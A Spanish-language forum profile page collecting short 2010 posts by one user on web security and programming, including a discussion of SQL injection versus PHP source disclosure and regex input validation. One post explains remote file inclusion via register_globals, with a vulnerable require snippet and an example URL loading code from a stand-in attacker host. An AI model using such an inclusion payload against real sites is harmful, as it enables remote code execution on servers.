Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Shell Root

#2951
Nivel Web / Re: Sql injection con filtro.
4 Junio 2010, 06:30 AM
Ahh ok ok, no había entendido. Lo que dijo ~ Yoya ~ , es de que intentase analizar como es la iSQL.
#2952
Nivel Web / Re: Sql injection con filtro.
4 Junio 2010, 01:32 AM
Cita de: KaozC9 en  4 Junio 2010, 01:14 AM
a lo que se refieren es que no es una vulnerabilidad de SQLi y cuando dice
Cita de: ~ Yoya ~ en 25 Mayo 2010, 18:09 PM
porque mejor aprendes  a interpretar las respuesta de las consultas, así sabrás lo que haces... ::)
se refiere a esto
Warning: highlight_file(show-source.php\') [function.highlight-file]: failed to open stream: No such file or directory in /var/www/sistema/libs/jpgraph/php5/src/Examples/show-source.php  on line 1

Eso te d¡ce mucho, no es SQLi, lo unico que hace es mostrar el source de un archivo con la funcion highlight_file de php
WTF! De que estas hablando?
#2953
Leiste bien?
Cita de: shellroot@alex-laptop:~$ en  3 Junio 2010, 20:27 PMAquí si el parámetro $page no se inicializa y si las register_globals están activados, el servidor será vulnerable a la ejecución remota de código incluyendo cualquier archivo arbitrario en el parámetro $page.
#2954
Cuando las register_globals estan activadas en php.ini, puede permitir que un usuario inicialice varias variables no inicializadas anteriormente de manera remota.

Muchas veces esto es utilizado para que un usuario malévolo pueda incluir ficheros no deseados y le permite ejecutar código arbitrario desde una localización remota.

Por ejemplo:
Código (php) [Seleccionar]
require ($page. ?.php?);

Aquí si el parámetro $page no se inicializa y si las register_globals están activados, el servidor será vulnerable a la ejecución remota de código incluyendo cualquier archivo arbitrario en el parámetro $page.

Este sería un ejemplo:
    "www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt"

Más información: :http://www.desarrolloweb.com/articulos/principales-vulnerabilidades-web.html
#2955
Lo haz hecho o no? Solo son hipótesis?
#2956
Pero, no se, aveces me pasa que quiero ver un PDF y obligatoriamente lo tengo que descargar para poder verlo. Pero en ocasiones lo puedo ver en el navegador. Tal vez creo que es un pluggin. Pero lo que dices que es por cache, ahí si no se, supongo que debe ser igual.
#2957
Cita de: raul338 en  2 Junio 2010, 00:56 AMComo estas insistente con las expresiones regulares en los ultimos tiempos xDDDD

jajaja claro, porque podría practicar un poco de ReDoS! xD
#2958
Programación General / Re: ayuda
1 Junio 2010, 20:20 PM
y tu pregunta es?
#2959
Bueno, podes recorrer la cadena carácter por carácter, verificando cada uno de ellos.  :xD, ya sea de la forma en la que tenés del array o con una expresión regular.
#2960
Osea lo preguntaba, ya que podes validar eso, desde el momento en que se haga el input de la cadena, es decir, donde se ingresa esa cadena, pones algún tipo de validaciones con expresiones regulares, donde solo se puede ingresar letras y/o números.